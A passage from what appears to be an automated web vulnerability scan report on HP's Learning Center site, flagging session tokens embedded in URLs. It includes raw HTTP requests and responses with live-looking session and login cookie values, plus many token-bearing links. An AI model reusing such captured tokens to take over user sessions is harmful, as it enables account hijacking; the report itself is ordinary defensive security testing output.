<a href="/tutorials/viewHowTo/p/courseId/40440/Microsoft_Excel_2010.htm?courseSessionId=368864&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration shows you how to link and unlink information between Microsoft Excel 2010 workbooks.">Microsoft.. Excel 2010: linking and unlinking Excel workbooks</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/40439/Microsoft_Excel_2010.htm?courseSessionId=368863&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration introduces you to the new Microsoft Excel 2010 interface and teaches you some basic skills.">Microsoft.. Excel 2010: take a tour of the interface and learn basic skills</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/26569/Microsoft_PowerPoint.htm?courseSessionId=173979&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="You can create master slides in PowerPoint to add or change design elements and formatting in presentations. Learn how in this demonstration.">Microsoft.. PowerPoint 2007: create a new slide master</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/26589/Microsoft_PowerPoint.htm?courseSessionId=173986&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="In this demonstration you'll learn how to change options and customize the interface to find the toolbars and functions you need most.">Microsoft.. PowerPoint 2007: customize the PowerPoint interface</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/40443/Microsoft_PowerPoint.htm?courseSessionId=368867&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="You can create master slides in PowerPoint 2010 to add or change design elements and formatting in presentations. Learn how in this demonstration.">Microsoft.. PowerPoint 2010: create a new slide master</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/39829/Microsoft_Windows_7_.htm?courseSessionId=324159&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="In this demonstration, you will learn how to speed up your network and internet connections using Microsoft.. Windows.. 7 Professional.
">Microsoft.. Windows.. 7: speed up network and internet connections</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14762/Microsoft_Word_2007_.htm?courseSessionId=173980&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Microsoft Word 2007 offers new special features. Follow along with this demonstration to learn how to use a few of them.">Microsoft.. Word 2007: take a tour of special features</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14763/Microsoft_Word_2007_take_a_tour_of_the_Ribbon.htm?courseSessionId=174000&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration shows you how to use the Ribbon, the new, tabbed navigation system in Microsoft Word 2007.">Microsoft.. Word 2007: take a tour of the Ribbon</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14764/Microsoft_Word_2007_use_the_Track_Changes_feature.htm?courseSessionId=174001&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This step-by-step demonstration shows you how to track revisions to documents in Microsoft Word 2007.">Microsoft.. Word 2007: use the Track Changes feature</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/40442/Microsoft_Word_2010_take_a_tour_of_the_Ribbon.htm?courseSessionId=368866&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration shows you how to use the Ribbon in Microsoft Word 2010.">Microsoft.. Word 2010: take a tour of the Ribbon</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14172/Microsoft_Windows_Vi.htm?courseSessionId=173987&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration shows you how to back up the registry in Windows Vista.">Microsoft.. Windows Vista advanced customization: back up the registry</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14173/Microsoft_Windows_Vi.htm?courseSessionId=173988&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration shows you how to increase bandwidth for network and internet connections in Windows Vista.">Microsoft.. Windows Vista advanced customization: increase bandwidth for network and internet connections</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14168/Microsoft_Windows_Vi.htm?courseSessionId=173997&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration shows you how to find files using basic Search in Windows Vista.">Microsoft.. Windows Vista: find files using basic Search</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/35913/Microsoft_Windows_Vi.htm?courseSessionId=173978&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="The registry is the database of system settings for Windows Vista. In this demonstration you'll see how to find info in the registry.">Microsoft.. Windows Vista: find information in the registry</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14091/Microsoft_Windows_Vista_Sidebar_adding_gadgets.htm?courseSessionId=173999&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Make your desktop work for you by adding gadgets to the Windows Vista Sidebar.">Microsoft.. Windows Vista Sidebar: adding gadgets</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14761/Microsoft_Windows_Vista_use_Disk_Cleanup.htm?courseSessionId=173998&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="You can use Disk Cleanup Wizard to save hard disk space by deleting files you might not need. Learn how in this step-by-step demonstration.">Microsoft.. Windows Vista: use Disk Cleanup</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/19629/Color_your_business_.htm?courseSessionId=173976&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Learn how development of the right color scheme for your marketing collateral can take your business to the next level.">Color your business: develop a marketing color scheme</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/18330/Mastering_email_keep_your_inbox_clutter_free.htm?courseSessionId=175486&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Learn how to organize email files and folder structure and use your program's search functionality to achieve better inbox management.">Mastering email: keep your inbox clutter-free</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/25989/Microsoft_OneNote_creating_and_using_notebooks.htm?courseSessionId=175487&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Find out how to use notebooks in Microsoft OneNote 2007 to organize your notes by topic, project, class or organization.">Microsoft.. OneNote: creating and using notebooks</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/25990/Microsoft_OneNote_getting_started.htm?courseSessionId=175488&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Learn about the basics of Microsoft OneNote 2007 and how it helps you organize and keep track of notes and other pieces of information. No papers or sticky notes required!">Microsoft.. OneNote: getting started</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/18329/Use_color_coding_to_prioritize_your_email.htm?courseSessionId=175489&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Learn how to transform an unorganized sea of email messages in your inbox into an actionable, prioritized list so you know what to read first.">Use color-coding to prioritize your email</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/18331/Use_Google_Desktop_t.htm?courseSessionId=175490&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Do you have tons of files on your hard disk or in email archives, and you can't find what you need? Let Google Desktop be your retriever.">Use Google Desktop to find and retrieve what you need</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/16608/HP_Backup_and_Recovery_Manager_restore_files.htm?courseSessionId=175481&campusId=10163&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="All HP business desktop and notebook computers have HP Backup and Recovery Manager. Learn how to use this application to restore files in this demonstration.">HP Backup and Recovery Manager: restore files</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/16609/HP_Backup_and_Recovery_Manager_schedule_backups.htm?courseSessionId=175482&campusId=10163&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="All HP business desktop and notebook computers have HP Backup and Recovery Manager. This demonstration shows you how to use this application to back up files.">HP Backup and Recovery Manager: schedule backups</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/32049/HP_ProtectTools_Secu.htm?courseSessionId=175483&campusId=10163&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Get an overview of HP ProtectTools Security Manager and learn how to set up and use Smart Card (Java Card) functionality, step by step.">HP ProtectTools Security Manager: enable Smart Card security</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/32069/HP_ProtectTools_Secu.htm?courseSessionId=175484&campusId=10163&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Learn how to configure BIOS settings using the HP ProtectTools Security Manager.">HP ProtectTools Security Manager: using BIOS Configuration</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/32089/HP_ProtectTools_Secu.htm?courseSessionId=175485&campusId=10163&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Get an overview of HP ProtectTools Security Manager and learn how to set up and use SSO functionality, step by step.">HP ProtectTools Security Manager: using single sign-on</a>
...[SNIP]...
<img src="/resources/images/s.gif" border="0" width="5" height="1" alt=""/>
<a href="/courses/refer.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a&target=http%3A%2F%2Fh30187.www3.hp.com%2Fhowto_QL_courses.jsp%3FcontentType%3DHow-to%2Bin%2B2%26mcid%3Dexplore-create" class="bold">Email this site</a>
...[SNIP]...
<div id="rssLink"><a href="/rssfeed/index.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" class="udrlinebold">RSS feed</a>
...[SNIP]...
<div style="display:none">
   <img src="/is/f5d5880c29/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" height="1" width="1" alt=""/>
   <img src="/is/4c10f0403f/p/productId/104917/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" height="1" width="1" alt=""/>
   <img src="/is/61e4a4ca21/p/productId/104919/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" height="1" width="1" alt=""/>
   <img src="/is/4995506369/p/productId/104921/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" height="1" width="1" alt=""/>
   <img src="/is/13ef8b79bb/p/productId/104922/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" height="1" width="1" alt=""/>
   <img src="/is/012a5e459e/p/productId/104918/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" height="1" width="1" alt=""/>
   <img src="/is/fe52e42a06/p/productId/104920/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" height="1" width="1" alt=""/>
</div>
...[SNIP]...

5.4. http://h30187.www3.hp.com/index.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://h30187.www3.hp.com
Path:	/index.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

http://h30187.www3.hp.com/?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&tab=allClasses
http://h30187.www3.hp.com/?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&tab=atWork
http://h30187.www3.hp.com/?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&tab=getStarted
http://h30187.www3.hp.com/all_courses.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/articles/viewArticle/p/courseId/39573/Keep_your_kids_safe_.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/campus/p/campusId/11261/Digital_photography.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/campus/p/campusId/11262/Home_office.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/campus/p/campusId/11263/Microsoft_Office_and_Adobe.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/campus/p/campusId/11264/PC_security_and_maintenance.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/courses/overview/p/courseId/38089/Network_attached_storage.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/courses/overview/p/courseId/39815/Touch_up_digital_pho.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/courses/overview/p/courseId/40470/Beginner_s_guide_to_digital_scrapbooking.htm?campusId=11200&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/courses/refer.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&target=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jsp
http://h30187.www3.hp.com/discussions/forum/p/forumId/37182/Office_productivity.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/discussions/forum/p/forumId/37183/Lifestyle_and_personal_development.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/discussions/forum/p/forumId/37184/Digital_photography_and_design.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/discussions/forum/p/forumId/37187/Personal_computing.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/discussions/messageBoard/p/messageBoardId/2338/All_Campuses.htm?campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/discussions/new/viewMessageBoard/p/messageBoardId/2338?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/discussions/viewTopic/p/postId/2302987/messageBoardId/2338/topicId/2302813/Re_Vista_problem.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/discussions/viewTopic/p/postId/2302988/messageBoardId/2338/topicId/2302111/Re_AdvancedWord.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/discussions/viewTopic/p/postId/2302994/messageBoardId/2338/topicId/2268940/Re_INTRODUCE_YOURSELF_HERE_.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/discussions/viewTopic/p/topicId/2302989/advanced_word_lesson_4_quiz.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/discussions/viewTopic/p/topicId/2302993/WLAN_not_tured_on.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/howto_QL_courses.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&contentType=How-to+in+2
http://h30187.www3.hp.com/howto_QL_courses.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&contentType=Quick+Lesson
http://h30187.www3.hp.com/index.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/2e165f9239/p/productId/104921/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/5b44ba4bbe/p/productId/104919/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/5c1282e20f/p/productId/104693/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/8ff1a817fe/p/productId/104833/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/b0437330bf/p/productId/104917/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/b4a0598c18/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/b51b2888fe/p/productId/104694/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/c87c677db9/p/productId/104695/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/d2ffce4aeb/p/productId/104922/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/d4d43abb27/p/productId/104924/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/ea95574468/p/productId/104834/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/is/f573d11a0e/p/productId/104923/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/page/p/title/faq?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/rssfeed/index.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/sessions/index.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
http://h30187.www3.hp.com/support/contactUs.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
https://h30187.www3.hp.com/security/forgotPassword.jsp?target=http://h30187.www3.hp.com/index.jsp?forgot=true&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba
https://h30187.www3.hp.com/security/login.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&target=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jsp
https://h30187.www3.hp.com/security/register.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba

Request

GET /index.jsp HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Jun 2011 11:50:00 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:06 GMT
Set-Cookie: hplcpsession.id=c4887600cb3bd30c1b052a7e38ba; path=/
Set-Cookie: JSESSIONID=abcfp9AGUFyAb67LLyGdt; path=/
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38;PATH=/
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 66173
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">

<head>
<title>
HP
Learning center
...[SNIP]...
<h2 id="sectionalNavHeader">»<a href="/index.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" class="bold">Learning center</a>
...[SNIP]...
</span> <a href="https://h30187.www3.hp.com/security/login.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&target=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jsp" class="navmenu">Sign in</a>
...[SNIP]...
</span> <a href="/sessions/index.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba">My classes</a>
...[SNIP]...
</span> <a href="/all_courses.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba">All classes</a>
...[SNIP]...
</span> <a href="/discussions/new/viewMessageBoard/p/messageBoardId/2338?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba">Discussions</a>
...[SNIP]...
</span> <a href="/page/p/title/faq?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba">FAQ</a>
...[SNIP]...
</span> <a href="/support/contactUs.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba">Contact us</a>
...[SNIP]...
</span> <a href="/courses/refer.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&target=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jsp">Tell a friend</a>
...[SNIP]...
</span><a href="/?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&tab=atWork" >At work</a>
...[SNIP]...
</span><a href="/?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&tab=allClasses" >See all classes</a>
...[SNIP]...
</span><a href="/?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&tab=getStarted" >Get started</a>
...[SNIP]...
<div class="Button">

<a href="https://h30187.www3.hp.com/security/register.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" title="Register - it's free!">Register - it's free! »</a>
...[SNIP]...
</span><a href="https://h30187.www3.hp.com/security/forgotPassword.jsp?target=http://h30187.www3.hp.com/index.jsp?forgot=true&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >Forgot your password?</a>
...[SNIP]...
<div id="FeaturedCourseImage" class="">

<a href="/courses/overview/p/courseId/40470/Beginner_s_guide_to_digital_scrapbooking.htm?campusId=11200&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" ><img src="http://hplc-prod.s3.amazonaws.com/media/50685/Beg_guide_to_digital_scrapbooking_v5_180x110.jpg?v=1307469870000" border="0" alt="Beginner's guide to digital scrapbooking"/>
...[SNIP]...
</span><a href="/courses/overview/p/courseId/40470/Beginner_s_guide_to_digital_scrapbooking.htm?campusId=11200&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" class="color003366bld" title="This class introduces you to the fascinating world of digital scrapbooking. You'll learn how to create, print, save, and share a scrapbook page, start to finish.">Beginner's guide to digital scrapbooking</a>
...[SNIP]...
<div class="Button">

<a href="/courses/overview/p/courseId/40470/Beginner_s_guide_to_digital_scrapbooking.htm?campusId=11200&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >Enroll Now »</a>
...[SNIP]...
</span><a href="/all_courses.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" class="bold" title="See all classes">See all classes</a>
...[SNIP]...
<div class="Column LeftColumn">

<a href="/campus/p/campusId/11261/Digital_photography.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" ><img src="http://hplc-prod.s3.amazonaws.com/media/46048/digital-photography.jpg?v=1281723386000" alt="Digital photography"/>
...[SNIP]...
</span><a href="/campus/p/campusId/11261/Digital_photography.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >Digital photography</a>
...[SNIP]...
</span><a href="/campus/p/campusId/11261/Digital_photography.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >See all 22 classes</a>
...[SNIP]...
<div class="Column LeftColumn">

<a href="/campus/p/campusId/11262/Home_office.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" ><img src="http://hplc-prod.s3.amazonaws.com/media/46049/home-office.jpg?v=1281723061000" alt="Home office"/>
...[SNIP]...
</span><a href="/campus/p/campusId/11262/Home_office.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >Home office</a>
...[SNIP]...
</span><a href="/campus/p/campusId/11262/Home_office.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >See all 42 classes</a>
...[SNIP]...
<div class="Column LeftColumn">

<a href="/campus/p/campusId/11263/Microsoft_Office_and_Adobe.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" ><img src="http://hplc-prod.s3.amazonaws.com/media/46050/ms-office-adobe-home.jpg?v=1281723061000" alt="Microsoft Office and Adobe"/>
...[SNIP]...
</span><a href="/campus/p/campusId/11263/Microsoft_Office_and_Adobe.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >Microsoft Office and Adobe</a>
...[SNIP]...
</span><a href="/campus/p/campusId/11263/Microsoft_Office_and_Adobe.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >See all 32 classes</a>
...[SNIP]...
<div class="Column LeftColumn">

<a href="/campus/p/campusId/11264/PC_security_and_maintenance.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" ><img src="http://hplc-prod.s3.amazonaws.com/media/46051/pc-security-home.jpg?v=1281723387000" alt="PC security and maintenance"/>
...[SNIP]...
</span><a href="/campus/p/campusId/11264/PC_security_and_maintenance.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >PC security and maintenance</a>
...[SNIP]...
</span><a href="/campus/p/campusId/11264/PC_security_and_maintenance.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >See all 23 classes</a>
...[SNIP]...
</span><a href="/all_courses.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >See all classes</a>
...[SNIP]...
</span><a href="/howto_QL_courses.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&contentType=How-to+in+2" class="bold">How-to videos</a>
...[SNIP]...
</span><a href="/howto_QL_courses.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&contentType=Quick+Lesson" class="bold">Quick lessons</a>
...[SNIP]...
</span><a href="/courses/overview/p/courseId/38089/Network_attached_storage.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >Network attached storage</a>
...[SNIP]...
</span><a href="/articles/viewArticle/p/courseId/39573/Keep_your_kids_safe_.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >Keep your kids safe on the internet: creating an internet use action plan (quick lesson)</a>
...[SNIP]...
</span><a href="/courses/overview/p/courseId/39815/Touch_up_digital_pho.htm?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >Touch up digital photos with Adobe.. Photoshop.. Elements 8</a>
...[SNIP]...
</span><a href="/discussions/viewTopic/p/postId/2302994/messageBoardId/2338/topicId/2268940/Re_INTRODUCE_YOURSELF_HERE_.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >Re: INTRODUCE YOURSELF HERE!</a>
...[SNIP]...
<div class="postMetaData small">
Posted about 7 hours ago
in

<a href="/discussions/forum/p/forumId/37184/Digital_photography_and_design.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" class="udrline">Digital photography and design</a>
...[SNIP]...
</span><a href="/discussions/viewTopic/p/topicId/2302993/WLAN_not_tured_on.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >WLAN not tured on</a>
...[SNIP]...
<div class="postMetaData small">
Posted about 9 hours ago
in

<a href="/discussions/forum/p/forumId/37183/Lifestyle_and_personal_development.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" class="udrline">Lifestyle and personal development</a>
...[SNIP]...
</span><a href="/discussions/viewTopic/p/topicId/2302989/advanced_word_lesson_4_quiz.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >advanced word lesson 4 quiz</a>
...[SNIP]...
<div class="postMetaData small">
Posted about 15 hours ago
in

<a href="/discussions/forum/p/forumId/37182/Office_productivity.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" class="udrline">Office productivity</a>
...[SNIP]...
</span><a href="/discussions/viewTopic/p/postId/2302988/messageBoardId/2338/topicId/2302111/Re_AdvancedWord.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >Re: AdvancedWord</a>
...[SNIP]...
<div class="postMetaData small">
Posted about 15 hours ago
in

<a href="/discussions/forum/p/forumId/37182/Office_productivity.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" class="udrline">Office productivity</a>
...[SNIP]...
</span><a href="/discussions/viewTopic/p/postId/2302987/messageBoardId/2338/topicId/2302813/Re_Vista_problem.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" >Re: Vista problem</a>
...[SNIP]...
<div class="postMetaData small">
Posted about 17 hours ago
in

